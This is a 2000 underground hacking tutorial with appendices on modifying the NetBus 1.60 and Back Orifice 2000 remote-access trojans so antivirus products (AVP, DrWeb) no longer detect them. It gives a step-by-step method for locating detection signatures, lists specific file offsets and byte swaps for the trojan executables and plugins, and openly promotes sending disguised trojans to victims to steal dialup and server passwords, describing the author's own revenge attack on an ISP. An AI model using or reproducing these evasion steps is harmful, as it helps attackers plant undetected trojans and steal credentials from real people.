new tr0jans patching tutorial part 1 date : 10-05-2000 23:48:01 author : b@$t sh()t of unlimited group editor : Phreezer Burn - thanks version 1.0(yes this is first version with bugs, mistakes and other crap) home page : http://infected.ilm.net/unlg/ lovely URL : http://infected.ilm.net/ LEGALESE -------- i sh4ll n0t b3 h3ld r3sp0ns1bl3 f0r any d4m4g3 cr34t3d b3 d1r3ct or 1nd1r3ct use of th3 publ1c1s3d m4t3r14l. th1s d0cum3nt 1s c0pyr1ted 2000 t0 m3, b@$t sh()t of unl!m!ted group. h3r3w1th i gr4nt anyb0dy l1cens3 t0 r3d1str1bute th1s d0cum3nt as l0ng as it is k3pt in wh0l3 and c0pyr1t3 n0t1c3 iz n0t r3m0v3d. als0 if i f1nd any lAm3rz wh0 just take the c0de published h3r3 and s4y it is their 0wn i w1ll s33 th4t they'll b3 punished.(b3l13v3 it or n0t :-))!!! (i'll get you! ;-) FROM AUTHOR ----------- On one sunny day, I found I needed to hack an internet service provider for revenge(yes revenge >:-]~~~ ). I knew all about that company. But, everything was protected by a firewall and antivirus software. I really needed to hack the account server, and the easiest way to reach success - to send a trojan to a lame girl-operator disguised as a love letter. Because the server had antivirus software, I needed a trojan that would avoid detection. I liked bo and didn't want to have to write another trojan(i have no free time, and i am too lazzzy ;-) For this reason, i used hiew, and after some hours, i got an undetectable trojan. Thus, that provider was hacked and I got all the passwords. Easy? Yes! You need passwords(dialup, ICQ, server access)? Do not try to hack routers and install sniffers! Send to the victim one trojan, and get all that you want! Whoa! The motto of trojan use - get all that you want ;-) Somewhere i hear this is crap, hehe. I didn't want to write this manual 'coz i am very lazy and I do not have too much free time, but Phreezer Burn asked me about trojan patching and i don't know about any docs written about this subject :-(. So, I wrote this manual for him. Say thanks to him and me too ;-) INTRODUCTION ------------- Welcome to first my tutorial about computers. Sorry I do not know English very well and can make many mistakes. I think my editor will correct text, but original is very difficult to understand. ok, let's go THE TOOLS ---------- The first thing you must know is x86 assembler(sorry man, but if you don't know it - you can't patch/crack any program). The best way to learn is time and books. You need very much time to understand assembler (heh just to remember the commands). x86, x86 286, protected mode, real mode, x86 386, Pentium, Pentium II, Pentium III, MMX, 3dNow! .... ohh there are many commands at my computer, and you must know it all! (hint: I don't know all commands, but I am a smartass and have many cool books ;-) You must also know how to use a debugger(any, i like Turbo Debugger from TP 7.0 and SoftIce). ooops.... all that I wrote 1 min before was bullshit! You only must know assembler and logic of executable files! the tools for exploring and patching windows 9* - you must work only at leet OS ;-) hex editor - for changing bytes at tr0jans i recommend HIEW by S.E.N. if you want the hiew? try find it at infected.ilm.net antivirus soft - this software for testing you trojan AVP very big database with masks, DrWeb - the best software IMHO Mr. Daniloff write nice fag, McAfee - i like this antivirus 'coz it installed with hotmail free email service and detect all new trojans (but my trojans life 3-6 months ;-) Norton Antivirus - sometimes you will patch trojans against this antivirus. that's all THE GENERAL STUFF ----------------- "the teknology" that antivirus software uses is for detecting viruses, trojans and other kewl stuff that is very bad. They all use a mask, I call it a "magic mask" (c) b.$. //UnlG ;-) A magic mask is part of a code which exists in only 1 file in the w0rld. Meaning, that the "magic mask" is a unique part of the code of a phile that is only found in that file, and in no other philez anywhere. As you know, on the Internet, you can download some hundreds of millions of unique files, and the work of antivirusmen is to discover the programs and "extract" that magic mask. That's all. (hint: modern antivirus software uses very smart mask or some masks for one phile) OLD STYLE MASK(hex): \x00\x12\x45\x00\x00\x00\x89\x88\x88\x87 If your file contains that chain in the body, antivirus warns you about a virus in the file. (this is not the real mask) If you change only one byte in the file, the antivirus does not warn about any interesting thing in the file. NEW MASK smart (hex): \x00\x12\x??\x??\x??\x??\x??\x88\x88\x87 \x?? - any byte(non stable) This mask is very difficult to extract, though, the new tekniq is pretty nice 'coz you must change only stable bytes (not \x??). do you understand? I hope the answer is yeaahh ! ;-) The new viruses are detected only with the new mask 'coz many people like to patch/change viruses for futher spreading via Internet. Only a clever coder/patcher can 100% patch code against antivirus. I forgot to write another smart mask! damn, my brain has got a kernel panic ;-) Smart mask 2 does not compare the whole byte, they compare bit! Yeah! Bit masking is now used in advanced software. Buy, every method has "mistakes", OOPS, not a mistake but a very bad situation when the method doesn't work right. Man's logic always wins against machine coded algorithms. YOUR WORK --------- The best way to study patching is through work, you must work hard. You should study methods of programming/compiling of assembler and code. If you decompile and work with about 50 mb of executable code, you will beceome very claever, and smart. ;-) ohh... at that point i think you should know assembler (a little) And now lets start to work on our new patched version of .... hmm .... NetBus 1.60! i like the graphical client and the little explorer in the client. For finding the "magic mask," you must fill(\x20 or \x61) 1 kb from start of the phile and then scan it by AVP. If antivirus software does not detect anything the mask is here in the first 1000 bytes of the phile. If AVP does detect the netbus trojan - fill next 1000 bytes of phile(from offset 1000 to 2000), and repeat filling till you find place of mask (remember! the new antivirus software has one or more masks). To save time, i copy trojan in 10 philes and fill it so: 1: 0-1000 bytes 2:1000-2000 bytes 3:2000-3000 bytes 4:3000-4000 bytes 5:4000-5000 bytes 6:5000-6000 bytes 7:6000-7000 bytes 8:7000-8000 bytes 9:8000-9000 bytes 10:9000-10000 bytes If you don't find offset of the mask in these 10 files, you repeat from offset 10000. When you find the offset, you begin to fill from current offset by 100 bytes example: AVP doesn't detect the trojan in file 8 (filled part from 7000 to 8000). So, you start to fill from offset 7000 by 100 bytes to exactly detect the offset of the start of the magic mask. After finding the start, you can fill every assembler command to find the exact mask (i can detect all byte masks - sometimes i detect bit masks, but it's very difficult - smartassed programmers don't like patched viruses and trojans ;-) (hint : the mask is not more than 100-200 bytes) When you find the part of code which is detectable by AVP, you must recode this part. Remember I said that you must know x86 assembler? hehe now your skill will help you...or maybe not ;-) If you kill any assembler command your trojan will not work right. It will crash the remote system and this does not help you get some passwords for XXX sites ;-) you must recode code like this (the simplest method) original bytes -------------- 000547E0: 0F8386000000 jae 00005486C -------- (1) 000547E6: B8B4894500 mov eax,0004589B4 <-exchange it 000547EB: BA98544500 mov edx,000455498 <- (aVP 2 mask) 000547F0: E8CFE4FAFF call 000002CC4 -------- (2) 000547F5: 6A08 push 008 recoded bytes: -------------- 000547E0: 0F8386000000 jae 00005486C -------- (1) 000547E6: BA98544500 mov edx,000455498 000547EB: B8B4894500 mov eax,0004589B4 000547F0: E8CFE4FAFF call 000002CC4 -------- (2) 000547F5: 6A08 push 008 the mask (not exact) 0F8386000000B8B4894500BA98544500E8CFE4FAFF6A08 we change it on 0F8386000000BA98544500B8B4894500E8CFE4FAFF6A08 I exchange 2 assembler commands to change the mask. the MOV command move (i describe intel assembler, not AT&T) to register(f**k, read description of special registers of x86 processor in a manual :-) eax number 000489B4, second command that I exchange moves to register edx number 00045498. It's unimportant which of these 2 commands executes first. And, I use this exchange for an easy patch of the code. The trojan works correctly 'coz all of the commands execute right. But, AVP cannot find "the mask"! That's right, we have achieved our purpose: our server/trojan is not detectable by crappy antivirus. EXAMPLE: -------- This is one of my real patching projects. antivirus patch for netbus 1.60(4) patch descripti0n see add on SOME HINTS/ADVICES: ------------------- 1. Some trojans create some files (data, dll, other crap), antiviruses often detect these files when somebody tries to create them. You must patch the entire package. Install the trojan on your own system and test it. When I patch a trojan, I install it 10-50 times every hour 8-) but the work is done correctly everytime. 2. Some philes are very long, possibly over 500 kb, think about the fast method to find nearest 100 kb of code with mask! if you will fill 900 kb file up to end by 1000 bytes you lost too many times. my advice - cut phile on 4 equal parts and check what part contain mask use part with mask for further search. 3. Use only the easy patch method(command exchange). 4. Find fravia's web server and study cracking - patching is more like cracking, but cracking is the art, whereas hacking and patching are just the work. 5. I know about a little program by Zombie(hey! nice work man) which can hack the AVP database. I like it, but my laziness doesn't allow me to compile it and use against this software, but if you like to compile you can find this program at ..... [3 min later] ..... 29A virus emag. This is a kewl emag, and i like to read it to my kidz as bedtime tale ;-) 9. You should read my hints chapter often. I write more interesting stuff here than in the rest of my manual. So, I am not a writer, not a coder, not a cracker, not a hacker not a..... f**k, what am i?? 8-) CREDITS ------- dark nigth - some text I ripped from his VBB manual unlimited group - my lovely group - all manuals, docs, advs, progs i wrote 4 them. Phreezer Burn - hi man! this is your manual too, use it and hack th3 l4m3rz ;-) infected.ilm.net - they allow our group to publish all what we want eFFeCT design - for design of our home page UCF2000 - always first! ;-) 29A - the new virus/research force - i nearly fear....8-[ brr ADD ON! _______ ======================================================-[2000-01-18 UnlG]-==== antivirus patch for netbus 1.60(4) patch descripti0n unlimited group t0pic: if you want get some dialup passwords from a "lame user," use patched version of tr0jan, 'cause official releases will be caught by antivirus :-( release against:drWeb 4.11 and AVP 3.0 build 131 category: info ann0unced: 2000-01-18 linux 0nly: nope, kewl win32 version disc0vered: b@$t sh()t //UnlG =[ secure! full description ]================================.private.======= Netbus 1.60 4th patch (i think somebody send my patch to Kasperski ;-) keyHook.dll (AVP mask a21e-a228) 0000A21B: 83C4B4 add esp,-04C ;"L" <- exchange it 0000A21E: B8C0AD4000 mov eax,00040ADC0 <- (AVP sucks) 0000A223: E8D89AFFFF call 000003D00 -------- (1) 0000A228: A1ACB24000 mov eax,[00040B2AC] 0000A22D: C70084AC4000 mov d,[eax],00040AC84 patch.exe (AVP masks 547e6-54886 and 54a7f-54a89 and "keyhook.part" ) 000547E0: 0F8386000000 jae 00005486C -------- (1) 000547E6: B8B4894500 mov eax,0004589B4 <-exchange it 000547EB: BA98544500 mov edx,000455498 <- (aVP 2 mask) 000547F0: E8CFE4FAFF call 000002CC4 -------- (2) 000547F5: 6A08 push 008 000547F7: 8D45FC lea eax,[ebp][-0004] 000547FA: B9A8544500 mov ecx,0004554A8 000547FF: 8B15B4894500 mov edx,[0004589B4] 00054805: E82EE7FAFF call 000002F38 -------- (3) 0005480A: 8B4DFC mov ecx,[ebp][-0004] 0005480D: B201 mov dl,001 0005480F: A178514500 mov eax,[000455178] 00054814: E8E3FDFFFF call 0000545FC -------- (4) 00054819: A3B8894500 mov [0004589B8],eax 0005481E: A1B8894500 mov eax,[0004589B8] 00054823: 8B5814 mov ebx,[eax][00014] 00054826: 8B03 mov eax,[ebx] 00054828: 85C0 test eax,eax 0005482A: 742C je 000054858 -------- (5) 0005482C: 50 push eax 0005482D: 6AFF push 0FF 0005482F: 6800000F00 push 0000F0000 00054834: E81303FBFF call 000004B4C -------- (6) 00054839: 8BF0 mov esi,eax 0005483B: 6A00 push 000 0005483D: 6A00 push 000 0005483F: 6A12 push 012 00054841: 8B4304 mov eax,[ebx][00004] 00054844: 50 push eax 00054845: E8AA08FBFF call 0000050F4 -------- (1) 0005484A: 6AFF push 0FF 0005484C: 56 push esi 0005484D: E87203FBFF call 000004BC4 -------- (2) 00054852: 56 push esi 00054853: E81C01FBFF call 000004974 -------- (3) 00054858: E8CF01FBFF call 000004A2C -------- (4) 0005485D: 8903 mov [ebx],eax 0005485F: A130754500 mov eax,[000457530] 00054864: 8B00 mov eax,[eax] 00054866: 8B4024 mov eax,[eax][00024] 00054869: 894304 mov [ebx][00004],eax 0005486C: 33C0 xor eax,eax 0005486E: 5A pop edx 0005486F: 59 pop ecx 00054870: 59 pop ecx 00054871: 648910 mov fs:[eax],edx 00054874: 6889544500 push 000455489 00054879: 8D45FC lea eax,[ebp][-0004] 0005487C: E8EFE3FAFF call 000002C70 -------- (1) 00054881: C3 retn 00054882: E909DEFAFF jmp 000002690 -------- (2) 00054887: EBF0 jmps 000054879 -------- (3) 00054889: 5E pop esi 0005488A: 5B pop ebx 0005488B: 59 pop ecx 0005488C: 5D pop ebp 0005488D: C3 retn and/or ;-) 00054A79: 8BEC mov ebp,esp 00054A7B: 83C4F4 add esp,-00C 00054A7E: 53 push ebx <-exchange it 00054A7F: B8D8544500 mov eax,0004554D8 <-(heh AVP) 00054A84: E837FEFAFF call 0000048C0 -------- (1) 00054A89: 8B1D30754500 mov ebx,[000457530] part of keyhook (patch it tooooo...) 000690CB: 83C4B4 add esp,-04C ;"L" <-exchange it 000690CE: B8C0AD4000 mov eax,00040ADC0 <- (AVP flyy..) 000690D3: E8D89AFFFF call 000062BB0 -------- (2) 000690D8: A1ACB24000 mov eax,[00040B2AC] 000690DD: C70084AC4000 mov d,[eax],00040AC84 bonus info! <- i like it! patch.exe 00051C25: BA31D40000 mov edx,00000D431 <- port bind ;-) 00051C2A: 8B83DC010000 mov eax,[ebx][0000001DC] 00051C30: E8B384FEFF call 00003A0E8 -------- (3) netbus.exe 0005EA80: 8B804C020000 mov eax,[eax][00000024C] 0005EA86: BA31D40000 mov edx,00000D431 <- port connect! 0005EA8B: E8C43EFEFF call 000042954 -------- (2) 0005EA90: 8B45FC mov eax,[ebp][-0004] 3039 - 12345 original D431 - 54321 patch 3 1770 - 6000 patch 4! ;-) another bonus NetBus password storing clear text at registry [HKEY_CURRENT_USER\PATCH\Settings] "ServerPwd"="unlg" II. S0luti0n trust no1, and never trust antivirus companies :-)) antivirus patch for netbus 1.60(4) patch descripti0n unlimited group ===============================================================.private.===== unlimited gr0up Home Page: http://infected.ilm.net/unlg/ Our Web Site: http://infected.ilm.net/ c0nfidential c0ntacts: 0nly "real life" chat n0t c0nfidential c0ntacts: undernet#c0de or unlg@hotmail.com PGP Key: i hate PGP and 0ther crappy t00lz XoR crypting rules! ;-) Greetz: SGWW, UCL, uCF, SoS, 29A and other kewl ppl! ======================================================-[2000-01-18 UnlG]-==== ADDON! END __________ i add second addon after writing the doc. Phreezer needed it. May be you too decide that it helpful information second add on _____________ ======================================================-[2000-01-13 UnlG]-==== antivirus patch for back orifice 2000 patch descripti0n unlimited group t0pic: if you want get some dialup passwords from "lame user" use patched version of tr0jan 'cause official releases will be caught by antivirus :-( release against:drWeb 4.11 and AVP 3.0 build 131 category: info ann0unced: 2000-01-13 linux 0nly: nope, kewl win32 version disc0vered: b@$t sh()t //UnlG =[ secure! full description ]===================================.private.==== =-=-=-=-[bo2k.exe server file]-=-=-=-= bo2k.exe: -- > program entry point: AVP and drWeb checking code: 00011CD6: 55 push ebp 00011CD7: 8BEC mov ebp,esp 00011CD9: 81EC780C0000 sub esp,000000C78 00011CDF: 53 push ebx 00011CE0: 56 push esi 00011CE1: 33DB xor ebx,ebx <- exchange it 00011CE3: 57 push edi <- (AVP) 00011CE4: 53 push ebx 00011CE5: FF15A4311503 call GetModuleHandleA ;KERNEL32.dll 00011CEB: A3D0CC1503 mov [00315CCD0],eax 00011CF0: E825C2FFFF call 00000DF1A -------- (1) 00011CF5: E855CBFFFF call 00000E84F -------- (2) 00011CFA: BF5CA81503 mov edi,00315A85C 00011CFF: 6870AA1503 push 00315AA70 00011D04: 57 push edi 00011D05: E8DDC5FFFF call 00000E2E7 -------- (3) 00011D0A: 6864AB1503 push 00315AB64 00011D0F: 57 push edi 00011D10: 8945E4 mov [ebp][-001C],eax 00011D13: E8CFC5FFFF call 00000E2E7 -------- (4) 00011D18: 83C410 add esp,010 00011D1B: 8945FC mov [ebp][-0004],eax 00011D1E: FF1540311503 call GetCommandLineA ;KERNEL32.dll 00011D24: 8BF0 mov esi,eax 00011D26: 381E cmp [esi],bl 00011D28: 743F je 000011D69 -------- (1) 00011D2A: 46 inc esi 00011D2B: 807EFF20 cmp b,[esi][-0001],020 ;" " 00011D2F: 75F5 jne 000011D26 -------- (2) 00011D31: 381E cmp [esi],bl 00011D33: 7434 je 000011D69 -------- (3) 00011D35: 684CAB1503 push 00315AB4C 00011D3A: 57 push edi 00011D3B: E8A7C5FFFF call 00000E2E7 -------- (4) 00011D40: 59 pop ecx 00011D41: 85C0 test eax,eax 00011D43: 59 pop ecx 00011D44: 7423 je 000011D69 -------- (5) 00011D46: 8B3D94301503 mov edi,[003153094] 00011D4C: 56 push esi 00011D4D: FFD7 call edi 00011D4F: 85C0 test eax,eax 00011D51: 7516 jne 000011D69 -------- (6) 00011D53: FF1514311503 call GetLastError ;KERNEL32.dll 00011D59: 83F802 cmp eax,002 00011D5C: 740B je 000011D69 -------- (7) 00011D5E: 6A64 push 064 drWeb point (chg to 6A65h) 00011D60: FF156C311503 call Sleep ;KERNEL32.dll 00011D66: 56 push esi 00011D67: EBE4 jmps 000011D4D -------- (1) 00011D69: 395DFC cmp [ebp][-0004],ebx 00011D6C: 0F84F5040000 je 000012267 -------- (2) 00011D72: 391DBCAD1503 cmp [00315ADBC],ebx 00011D78: 895DF8 mov [ebp][-0008],ebx 00011D7B: C745EC2CAA1503 mov d,[ebp][-0014],00315AA2C 00011D82: 7507 jne 000011D8B -------- (3) 00011D84: C745ECF4A91503 mov d,[ebp][-0014],00315A9F4 00011D8B: 8D8588F3FFFF lea eax,[ebp][0FFFFF388] 00011D91: 6800020000 push 000000200 00011D96: 50 push eax 00011D97: FF35D0CC1503 push d,[00315CCD0] 00011D9D: FF15B4311503 call GetModuleFileNameA ;KERNEL32. 00011DA3: 685CAA1503 push 00315AA5C 00011DA8: 685CA81503 push 00315A85C 00011DAD: E866C4FFFF call 00000E218 -------- (4) drWeb mask 11D5E to 11D9D (any byte) AVP mask 11CD0 to 11D59 (may be any byte) drWeb patch : 00011D5E: 6A64 push 064 drWeb point (change to push 065 =6A65h)??? AVP patch: 00011CE1: 33DB xor ebx,ebx <- exchange it 00011CE3: 57 push edi <- (AVP) (a little dll patch.bo2k.exe have littke file inside! patch it too!) 0001CE13: 8B442404 mov eax,[esp][00004] 0001CE17: A3B45C0010 mov [010005CB4],eax <- exchange it 0001CE1C: 6A01 push 001 <- (DrWeb) 0001CE1E: 58 pop eax and 0001CF38: 8B4E10 mov ecx,[esi][00010] 0001CF3B: 8BD7 mov edx,edi <- exchange it 0001CF3D: 8BC1 mov eax,ecx <- (AVP) 0001CF3F: C1E803 shr eax,003 =-=-=-=-[bo2kcfg.exe configurator]-=-=-=-= bo2kcfg.exe: -- > program entry point: Web checking code: 00006BFA: 55 push ebp 00006BFB: 8BEC mov ebp,esp 00006BFD: 6AFF push 0FF 00006BFF: 6870F24100 push 00041F270 00006C04: 68C0984000 push 0004098C0 <- exchange 00006C09: 64A100000000 mov eax,fs:[000000000] <- antiWeb 00006C0F: 50 push eax 00006C10: 64892500000000 mov fs:[000000000],esp 00006C17: 83EC58 sub esp,058 ;"X" 00006C1A: 53 push ebx 00006C1B: 56 push esi 00006C1C: 57 push edi 00006C1D: 8965E8 mov [ebp][-0018],esp 00006C20: FF15D4D14100 call GetVersion ;KERNEL32.dll AVP checking code 000053FF: 892500000000 mov [000000000],esp 00005405: 81ECFC010000 sub esp,0000001FC 0000540B: 56 push esi 0000540C: 8BF1 mov esi,ecx 0000540E: 56 push esi 0000540F: 6878414200 push 000424178 00005414: 6804100000 push 000001004 00005419: 6A00 push 000 0000541B: 6870414200 push 000424170 00005420: 6A01 push 001 00005422: 8D4C2420 lea ecx,[esp][00020] 00005426: E887C60000 call 000011AB2 -------- (1) 0000542B: 8D4C2408 lea ecx,[esp][00008] 0000542F: C784240802000000000000 mov d,[esp][000000208],000000000 0000543A: E8D5C70000 call 000011C14 -------- (2) 0000543F: 83F801 cmp eax,001 00005442: 7536 jne 00000547A -------- (3) 00005444: 8D442404 lea eax,[esp][00004] 00005448: 8D4C2408 lea ecx,[esp][00008] 0000544C: 50 push eax 0000544D: E89DC80000 call 000011CEF -------- (4) 00005452: 8B00 mov eax,[eax] <--- exchange 00005454: 8BCE mov ecx,esi <--- it (AVP) 00005456: 50 push eax 00005457: 6804040000 push 000000404 0000545C: C684241002000001 mov b,[esp][000000210],001 00005464: E8871E0100 call 0000172F0 -------- (1) 00005469: 8D4C2404 lea ecx,[esp][00004] 0000546D: C684240802000000 mov b,[esp][000000208],000 00005475: E8ADF00000 call 000014527 -------- (2) 0000547A: 8D8C24B4000000 lea ecx,[esp][0000000B4] 00005481: C784240802000002000000 mov d,[esp][000000208],000000002 0000548C: E896F00000 call 000014527 -------- (3) 00005491: 8D4C2408 lea ecx,[esp][00008] 00005495: C7842408020000FFFFFFFF mov d,[esp][000000208],0FFFFFFFF 000054A0: E8E8E60000 call 000013B8D -------- (4) 000054A5: 8B8C2400020000 mov ecx,[esp][000000200] 000054AC: 5E pop esi 000054AD: 64890D00000000 mov fs:[000000000],ecx 000054B4: 81C408020000 add esp,000000208 000054BA: C3 retn drWeb mask 6BFA to 6C10 (any byte) AVP mask 5400 to 54A0 (may be any byte) drWeb patch : 00006BFF: 6870F24100 push 00041F270 00006C04: 68C0984000 push 0004098C0 <- exchange 00006C09: 64A100000000 mov eax,fs:[000000000] <- antiWeb AVP patch : 00005452: 8B00 mov eax,[eax] <--- exchange 00005454: 8BCE mov ecx,esi <--- it (AVP) =-=-=-=-[bo2kgui.exe win32 GUI client]-=-=-=-= bo2kgui.exe: ---->program entry point Web checking code: 0001154E: 55 push ebp 0001154F: 8BEC mov ebp,esp 00011551: 6AFF push 0FF 00011553: 68C0A74400 push 00044A7C0 00011558: 680C524100 push 00041520C <-- exchenge 0001155D: 64A100000000 mov eax,fs:[000000000] <-- it! (drWeb) 00011563: 50 push eax 00011564: 64892500000000 mov fs:[000000000],esp 0001156B: 83EC58 sub esp,058 ;"X" 0001156E: 53 push ebx 0001156F: 56 push esi 00011570: 57 push edi 00011571: 8965E8 mov [ebp][-0018],esp 00011574: FF15B8524400 call GetVersion ;KERNEL32.dll AVP checking code: 0000FDA0: 83EC10 sub esp,010 0000FDA3: 56 push esi 0000FDA4: 57 push edi 0000FDA5: 8BF1 mov esi,ecx 0000FDA7: E8FEA20100 call 00002A0AA -------- (1) 0000FDAC: 680F080000 push 00000080F 0000FDB1: 8BCE mov ecx,esi 0000FDB3: E84FE50100 call 00002E307 -------- (2) 0000FDB8: 8B501C mov edx,[eax][0001C] 0000FDBB: 8D4C2408 lea ecx,[esp][00008] 0000FDBF: 51 push ecx 0000FDC0: 52 push edx 0000FDC1: FF15DC554400 call GetClientRect ;USER32.dll 0000FDC7: 8B442414 mov eax,[esp][00014] 0000FDCB: 8B4C240C mov ecx,[esp][0000C] 0000FDCF: 8B542408 mov edx,[esp][00008] 0000FDD3: 8B3D4C554400 mov edi,[00044554C] 0000FDD9: 2BC1 sub eax,ecx 0000FDDB: 8B4C2410 mov ecx,[esp][00010] 0000FDDF: 6A01 push 001 0000FDE1: 2BCA sub ecx,edx 0000FDE3: 50 push eax 0000FDE4: 51 push ecx 0000FDE5: 6A01 push 001 0000FDE7: FFD7 call edi 0000FDE9: 2B442420 sub eax,[esp][00020] 0000FDED: 99 cdq 0000FDEE: 2BC2 sub eax,edx 0000FDF0: D1F8 sar eax,1 0000FDF2: 50 push eax 0000FDF3: 6A00 push 000 0000FDF5: FFD7 call edi 0000FDF7: 8B4C2420 mov ecx,[esp][00020] 0000FDFB: 2BC1 sub eax,ecx 0000FDFD: 8BCE mov ecx,esi 0000FDFF: 99 cdq 0000FE00: 2BC2 sub eax,edx 0000FE02: D1F8 sar eax,1 0000FE04: 50 push eax 0000FE05: E8D9E60100 call 00002E4E3 -------- (1) 0000FE0A: 8B561C mov edx,[esi][0001C] <- exchange 0000FE0D: 6A00 push 000 <- it(AVP) 0000FE0F: 68B80B0000 push 000000BB8 0000FE14: 6A45 push 045 0000FE16: 52 push edx 0000FE17: FF1510554400 call SetTimer ;USER32.dll 0000FE1D: 5F pop edi 0000FE1E: B801000000 mov eax,000000001 0000FE23: 5E pop esi 0000FE24: 83C410 add esp,010 0000FE27: C3 retn 0000FE28: 9090909090909090 nop (s) 0000FE30: 8B442404 mov eax,[esp][00004] 0000FE34: 56 push esi 0000FE35: 83F845 cmp eax,045 ;"E" 0000FE38: 8BF1 mov esi,ecx 0000FE3A: 7507 jne 00000FE43 -------- (1) 0000FE3C: 6A00 push 000 0000FE3E: E842A10100 call 000029F85 -------- (2) 0000FE43: 8BCE mov ecx,esi 0000FE45: E848B80100 call 00002B692 -------- (3) 0000FE4A: 5E pop esi 0000FE4B: C20400 retn 00004 0000FE4E: 90 nop 0000FE4F: 90 nop 0000FE50: 56 push esi 0000FE51: 8BF1 mov esi,ecx 0000FE53: 6A00 push 000 0000FE55: E82BA10100 call 000029F85 -------- (1) 0000FE5A: 8BCE mov ecx,esi 0000FE5C: E831B80100 call 00002B692 -------- (2) 0000FE61: 5E pop esi 0000FE62: C20C00 retn 0000C 0000FE6F: 9090909090909090909090 nop (s) 0000FE70: E8B7A60100 call 00002A52C -------- (3) 0000FE75: 85C0 test eax,eax 0000FE77: 7408 je 00000FE81 -------- (1) 0000FE79: 8B10 mov edx,[eax] 0000FE7B: 8BC8 mov ecx,eax 0000FE7D: FF5274 call d,[edx][00074] 0000FE80: C3 retn 0000FE81: 33C0 xor eax,eax 0000FE83: C3 retn 0000FE84: 8B01 mov eax,[ecx] 0000FE86: FFA0C4000000 jmp d,[eax][0000000C4] 0000FE8C: 8B01 mov eax,[ecx] 0000FE8E: FFA0C8000000 jmp d,[eax][0000000C8] drWeb mask 11553 to1155D (any byte) AVP mask FDA0 to FE90 (may be any byte) drWeb patch : 00011553: 68C0A74400 push 00044A7C0 00011558: 680C524100 push 00041520C <-- exchenge 0001155D: 64A100000000 mov eax,fs:[000000000] <-- it! (drWeb) AVP patch : 0000FE0A: 8B561C mov edx,[esi][0001C] <- exchange 0000FE0D: 6A00 push 000 <- it(AVP) =-=-=-=-[bo_peep.dll hijack plugin]-=-=-=-= bo_peep.dll: ---->program entry point Web checking code: 00003819: 8B442408 mov eax,[esp][00008] 0000381D: 48 dec eax 0000381E: 7509 jne 000003829 -------- (1) 00003820: 8B442404 mov eax,[esp][00004] 00003824: A384660010 mov [010006684],eax <- exchange 00003829: 6A01 push 001 <- it(drWeb) 0000382B: 58 pop eax 0000382C: C20C00 retn 0000C AVP checking code: (hijack??) 0000389B: 890DA8660010 mov [0100066A8],ecx 000038A1: A3B0660010 mov [0100066B0],eax 000038A6: 8915C8660010 mov [0100066C8],edx <-exch it 000038AC: BE88650010 mov esi,010006588 <- (AVP) 000038B1: 747E je 000003931 -------- (1) 000038B3: 57 push edi 000038B4: BF7C650010 mov edi,01000657C 000038B9: 57 push edi 000038BA: 6858650010 push 010006558 000038BF: 684C650010 push 01000654C 000038C4: 683C650010 push 01000653C 000038C9: 56 push esi 000038CA: 68C0450010 push 0100045C0 000038CF: FFD1 call ecx 000038D1: 53 push ebx 000038D2: 53 push ebx 000038D3: 53 push ebx 000038D4: 682C650010 push 01000652C 000038D9: 56 push esi 000038DA: 6850480010 push 010004850 <-if change it <-it will be <-bo2k.peep!? 000038DF: A390660010 mov [010006690],eax <-AVP gluk ;-) 000038E4: FF15A8660010 call d,[0100066A8] drWeb mask 3824 to 382B (any byte) AVP mask 38A0 to 38E0 (may be any byte) drWeb patch : 00003824: A384660010 mov [010006684],eax <- exchange 00003829: 6A01 push 001 <- it(drWeb) 0000382B: 58 pop eax AVP patch : 000038A6: 8915C8660010 mov [0100066C8],edx <-exch it 000038AC: BE88650010 mov esi,010006588 <- (AVP) =-=-=-=-[bo3des.dll hijack plugin]-=-=-=-= bo3des.dll: ---->program entry point Web checking code: 00001E06: 8B442408 mov eax,[esp][00008] 00001E0A: 48 dec eax 00001E0B: 7509 jne 000001E16 -------- (1) 00001E0D: 8B442404 mov eax,[esp][00004] 00001E11: A3B45C0010 mov [010005CB4],eax <- exchange it 00001E16: 6A01 push 001 <- (drWeb) 00001E18: 58 pop eax 00001E19: C20C00 retn 0000C AVP checking code: 00001EBA: 8B0DC05C0010 mov ecx,[010005CC0] 00001EC0: 8325BC5C001000 and d,[010005CBC],000 00001EC7: FF35B85C0010 push d,[010005CB8] 00001ECD: 8B01 mov eax,[ecx] 00001ECF: FF5018 call d,[eax][00018] 00001ED2: C3 retn 00001ED3: 8B442404 mov eax,[esp][00004] 00001ED7: 6A01 push 001 00001ED9: 6683600800 and w,[eax][00008],000 00001EDE: 6683600C00 and w,[eax][0000C],000 00001EE3: C70034440010 mov d,[eax],010004434 00001EE9: C740041C440010 mov d,[eax][00004],01000441C 00001EF0: 66C7400A0100 mov w,[eax][0000A],00001 00001EF6: 66C7400E0100 mov w,[eax][0000E],00001 00001EFC: 58 pop eax 00001EFD: C3 retn 00001EFE: 8B442404 mov eax,[esp][00004] 00001F02: 83601400 and d,[eax][00014],000 00001F06: 83601000 and d,[eax][00010],000 00001F0A: C70001234567 mov d,[eax],067452301 00001F10: C7400489ABCDEF mov d,[eax][00004],0EFCDAB89 ;"οΝ 00001F17: 90 nop 00001F18: 90 nop 00001F19: 0990909090C7 or [eax][0C7909090],edx 00001F1F: 40 inc eax 00001F20: 0C76 or al,076 ;"v" 00001F22: 54 push esp 00001F23: 3210 xor dl,[eax] 00001F25: C3 retn 00001F26: 55 push ebp 00001F27: 8BEC mov ebp,esp 00001F29: 53 push ebx 00001F2A: 56 push esi 00001F2B: 8B7508 mov esi,[ebp][00008] 00001F2E: 57 push edi 00001F2F: 8B7D10 mov edi,[ebp][00010] 00001F32: 8B4E10 mov ecx,[esi][00010] 00001F35: 8BD7 mov edx,edi <- exchange it 00001F37: 8BC1 mov eax,ecx <- (AVP) 00001F39: C1E803 shr eax,003 00001F3C: 8D0CF9 lea ecx,[ecx][edi]*8 00001F3F: 83E03F and eax,03F ;"?" 00001F42: C1E203 shl edx,003 00001F45: 3BCA cmp ecx,edx 00001F47: 894E10 mov [esi][00010],ecx 00001F4A: 7303 jae 000001F4F -------- (1) 00001F4C: FF4614 inc d,[esi][00014] 00001F4F: 6A40 push 040 00001F51: 8BCF mov ecx,edi 00001F53: 5B pop ebx 00001F54: C1E91D shr ecx,01D 00001F57: 014E14 add [esi][00014],ecx 00001F5A: 2BD8 sub ebx,eax 00001F5C: 3BFB cmp edi,ebx 00001F5E: 7242 jb 000001FA2 -------- (1) 00001F60: 53 push ebx 00001F61: 8D443018 lea eax,[eax][esi][00018] 00001F65: FF750C push d,[ebp][0000C] 00001F68: 50 push eax 00001F69: E8EC090000 call 00000295A -------- (2) 00001F6E: 8D4618 lea eax,[esi][00018] 00001F71: 50 